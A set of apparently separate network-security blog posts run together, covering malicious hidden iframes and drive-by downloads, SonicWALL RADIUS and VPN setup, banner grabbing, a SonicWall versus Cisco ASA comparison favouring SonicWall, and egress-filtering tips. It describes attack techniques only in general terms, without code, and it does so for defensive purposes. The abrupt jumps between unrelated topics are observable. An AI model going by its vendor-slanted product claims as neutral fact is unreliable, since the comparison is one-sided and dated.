Attackers typically compromise popular web sites and insert a malicious hidden iframe into a page hosted on the compromised site; the iframe redirects to another page on a server controlled by attackers; on this page usually heavily obfuscated code(like JavaScript) is used to serve malware. Users aren't aware they load content from another site when they view the compromised web page.

Popular web sites serving malware through iframes?

To name a few recent ones: Geek.com or Lenovo India Warranty.

How the malicious iframe looks like?

It can look in a couple of ways like shown below.

As we can spot from above, the Geek.com and Lenovo India iframes are different. A generic IPS signature looking for an iframe with a size of zero would have not caught the Geek.com malicious iframe.

Furthermore, there are additional ways of having non-visible iframes, through some div tags or scripts(the last two examples).

Malware types served

• » That automatically download and install malware; using exploits against vulnerabilities of browsers, etc., unpatched or 0-days ones. Hackers, based on the browser's user-agent, can attempt to serve multiple exploits against various vulnerabilities to obtain remote code execution.
• » That prompt the user to take some "suggesting" actions; without exploits like above, for example prompt the users to download and install malicious signed Java applets or show pop-up windows with a "click to do something" button.

Protections?

No bullet proof methods.
Use a Next Generation Firewall to mitigate on multiple fronts with a single edge device.

• » Use the NGFW's integrated IPS or Gateway antivirus to detect malicious iframes; SonicWall's integrated antivirus facility contains several signatures for detecting malicious iframes.

  

• » With this type of attacks, usually the malware is served from obscure sites; use the NGFW's integrated URL Filtering service and at a minimum block dangerous destinations if you do not use whitelist categories.

   

  

   

  
  As can be seen I've blocked access to the Not Rated category, as at the beginning the obscure site might be unknown.
• » Example of  a malware site taken from Dasient's malware infection library past week's top malware infections, the below URL was contained within an iframe, site detected by SonicWall's CFS:

  

• » Additionally the integrated IPS/Antivirus can block attempts to exploit known vulnerabilities against browsers, etc. or to download various backdoors etc.
  For example it was reported that the Geek.com malware attempted to exploit the Help Center URL Validation Vulnerability CVE-2010-1885
  The Backdoor Lecna exploited the same vulnerability, report from SonicWall:
  https://www.mysonicwall.com/sonicalert/searchresults.aspx?ev=article&id=246
• » Use Geo-IP and Botnet Filters to block access to possible dangerous countries(like Russia, China) if access to destinations from such countries is not work related; usually US is a top malware hosting country though.

SonicWALL RADIUS is a method used by your firewall to authenticate usernames and passwords.  When a user tries to authenticate to the network the SonicWALL will send the request to a RADIUS server for verification.  The RADIUS server will return a message back to the SonicWALL stating whether the username and password are correct.  If the user authenticates correctly the firewall will allow the user to login and access the resources requested.

Why You Need SonicWALL RADIUS

Using your SonicWALL firewall with a RADIUS server can help you centralize and manage  your user's log in information.  A common deployment is to enable the RADIUS services on a Windows Active Directory server so users can use their network username to log in.  Additionally, by have a single location to store username and passwords your users only have to manage one set of credentials to login and access the network.

How Do I Set it Up

In the following two videos we will show you how to setup a Windows 2008 Active Directory server to accept RADIUS authentication Requests.  In the second video we demonstrate how to configure the SonicWALL to communicate with the RADIUS server.

	Step 1: Windows RADIUS Server Setup This video will walk you through the process of enabling and configuring the RADIUS server on your Windows 2008 Active Directory Server.
	Step 2: Configuring RADIUS on your Firewall This video will walk you through the process of configuring RADIUS authentication on your SonicWALL firewall.

Additional Resources

What is a Banner?

A banner is simply the text that is embedded with a message that is received from a host. Usually this text includes signatures of applications that issue the message. So, they reveal themselves to us.

Background

Banner Grabbing is a fingerprinting technique. The term fingerprint comes from old fashioned police work. It refers to any trace (finger prints) that could be used for identification purposes. Banner Grabbing essentially relies on morphed or empty TCP packets that are sent over to a target machine. The response, which is in most cases an error, is then analyzed for identification. In some scenarios, a simple connection request could be exploited. Linux would respond differently than Windows. Apache and IIS (Internet Information Services) will reply differently. Valuable information is excavated out of nothing but a harmless (rather friendly) message.

How it's done?

Impact

Hackers grab banners all the time. Although IPs can be logged, hackers usually hide their real IP before grabbing. If they are successful in grabbing a few banners they can then use this information to find applications that are weak or have a security flaw. Attackers then focus on exploits that are targeted to the services that you are running. There are hundreds of services that can be queried for banners and more than often, a few have flaws or are simply old versions.

Remedy

This technique reveals critical information that can be devastating. To get rid of this, first you need to thoroughly analyze what information is leaked.
Set up your services properly. Default settings are always insecure. Read the documentation and turn off all the features that are unnecessary. Especially Apache and IIS.
Turn off services that you don't need such as telnet. On a windows system go to Control Panel > Programs and Features > Turn on/off windows features.

	SonicWall E-Class Network Security Appliance (NSA) Series are Next Generation Firewalls (NGFW). They offer integrated Applications Identification and Control, Antivirus Inspection, Content Filtering, IPS, Encrypted Traffic Inspection(like HTTPS), URL filtering or Geo-IP filtering service.
	Cisco Adaptive Security Appliance (ASA) 5500 series are UTMs, featuring a first generation firewall, Botnet Traffic Filter; IPS or Content and URL Filtering + Malware Inspection are available through services modules. Offer limited applications control; Cisco has announced plans to add application visibility into its ASA series with the new SecureX security architecture.

SonicWall E-Class NSA Series

The SonicWall NGFW uses a centric logic in creating filtering policies, user based policies rather than IP address based ones. Focuses on applications and applications' features granular control meaningless of port and protocol, out-of-the-box many applications being supported(custom control is also present); for example can differentiate between streaming video types like YouTube and Business Video Conference or block file transfers from IM.
Decrypts and inspects encrypted traffic(like HTTPS).

SonicWall E-Class NSA at work:

• » Allow and prioritize productivity related web applications like Salesforce.com, SAP, VoIP
• » Control unproductive but acceptable ones like Facebook(block features of it like games), Live View or Twitter.
• » Prohibit unneeded applications like BitTorrent or appleJuice.

SonicWall E-Class NSA series provide great visibility into the traffic flow, real-time picture of applications/protocols used by users through comprehensive integrated monitoring features; also bandwidth can be controlled and monitored per applications or users.

Cisco ASA 5500

The Cisco ASA UTM(as writing latest software version 8.4) uses the first generation firewalls logic in creating filtering policies, IP address based ones. Users are rather configured through the AAA feature. Focuses on port filtering and protocol inspection, some applications can be controlled by signatures through the Modular Policy Framework (MPF); in many cases administrators need to figure it out application signatures and use regular expressions; process susceptible to evasion/bypass by savvy users.

Advanced protection services are offered rather disjointed; for example IPS protection is available through the AIP-SSM,  AIP-SSC or IPS SSP modules; anti-malware, content and URL filtering through the CSC-SSM module. And only one such module is supported at a time on a single appliance; if both IPS and content inspection/antivirus/URL filtering functionalities are required, another appliance is needed. 

Limited visibility into the traffic flow out-of-the-box; greater visibility might be achievable with NSEL and Scrutinizer, not 100% live. Encrypted traffic like HTTPS is opaque, Cisco ASA cannot inspect it; usually Cisco ASA is paired with a solution like the one offered by Websense to address this.

Conclusion

As can be seen from above the SonicWall NGFW clearly has the edge over the Cisco ASA providing greater security and control over the data flow due to its advanced architecture and integrated inspection features, Cisco hasn't unveiled yet its SecureX security architecture.

Tips on SonicWALL to SonicWALL VPNs

SonicWALL VPN tunnels have a long list of configuration settings that can be daunting.  Here are a few key settings you should know:

1) Main Mode or Aggressive Mode - If both firewalls have static WAN IP addresses then choose main mode.  If one location has a dynamic IP address then choose aggressive mode.
2) Encryption Level - you can choose between DES, which is least secure but fast or AES-256, which is slower but much more secure.
3) Enable Keep Alive - if you are using an aggressive mode VPN tunnel you should enable this option to help keep the VPN tunnel up and runng.

Pre-Installation Checklist

Before you begin building the SonicWALL VPN tunnel you will need to know:

» Make sure at least one location has a static IP address.
» Ensure both network locations are using a different IP addressing scheme.
» Have a plan on whether you will allow full access across the VPN or need to limit access to resources.
» Install the latest firmware available for your SonicWALL.
» ALWAYS backup your SonicWALL configuration before and after you make changes.

Setting up the SonicWALL to SonicWALL VPN

To assist you with setting up the SonicWALL VPN we have assembled some easy to follow, step-by-step videos.  These videos will explain each of the VPN settings along the way to help ensure you are able to setup the SonicWALL VPN correctly. 

	Site to Site VPN Using Static WAN IP Addresses Learn how to setup a VPN network between two SonicWALL firewalls using static / fixed WAN IP addresses.
	Site to Site VPN Using A Dynamic WAN IP Address - Agressive Mode Learn how to setup a site-to-site VPN between two SonicWALLs using aggressive mode. This is a common VPN tunnel where the main office has a static / fixed public IP address and the remote office is using a dynamic IP address (e.g. from a cable or DSL ISP provider.)
	Setting up a Site-to-Site VPN Tunnel - Main Mode Learn how to setup a site-to-site (or network to network) VPN tunnel using the SonicWALL firewall VPN features.

Along with the benefits of granular control over users' applications, NGFW can go a long way in mitigating security risks; for example it's not sufficient for an attacker to sit on a 0-day vulnerability, it must be able to exploit it and benefit from this exploitation.

There are two main intersecting categories of risk for (egress) filtering considerations, a category that includes loss of work productivity or bandwidth abuse due to employee misconduct and one associated with attacks prevention.

Let's take a look.

	Enable encrypted traffic inspection(like HTTPS). While this gives you control over users' traffic inside the SSL tunnel, blocks by default (unwanted) applications using non-SSL traffic(like UltraSurf) and makes the firewall a SSL enforcer(allows only strong cipher suites or SSL/TLS protocols to be used, verifies servers' certificates, trusted root CAs control), also makes the attackers to raise their game; remember the Aurora Operation where the hackers setup the covert channel to the command and control server over TCP port 443 not using the SSL protocol.
	When doing URL filtering, instead of the regular approach(blacklist dangerous or unwanted destinations), consider the whitelist one: allow strictly the needed category destinations. This prevents users from accessing some obscure sites(or even unneeded popular ones) and attackers of using such sites as covert channel destinations or drive-by download points. Furthermore, when possible, disable scripts(like Java, strip script tags) for all web sites except for a list of sites, preventing malicious scripts to be served within web pages in an attempt to exploit 0-day browsers vulnerabilities.
	Depending on the firewall, create allow rules based on applications rather than allow rules per protocol plus block rules/signatures for unwanted applications or application features. Furthermore, apply user authentication on the rules so that users to be allowed to access only what's needed.
	It's not all about TCP ports 80 and 443, consider the recent RSA breach, the attackers siphoned out data using FTP; restrict allowed FTP destinations and control the FTP protocol usage(don't allow FTP uploads if unneeded); if possible apply antivirus inspection over FTP traffic and block the download/upload of files that cannot be scanned(like encrypted archives). Similar for other stuff(for emails consider stripping certain attachments).
	Perform bandwidth allocation and monitoring; along with the advantage of allocating bandwidth properly and having a (live) picture of the users and their connections bandwidth utilization, you can detect attempts of siphoning out data; you might remember the old Joint Strike Fighter project incident where hackers were reported to steal terabytes of data. Use virtual patching with the integrated IPS to reduce the vulnerability window between vulnerability disclosure and patch deployment. It's not uncommon to see unpatched browsers vulnerabilities actively exploited.
	While thinking big and aiming high(application control), don't forget the little guy; the late TCP split handshake issue (un)surprisingly showed weaknesses in the way some firewalls perform stateful packet inspection(either due to limitations or relaxed configurations).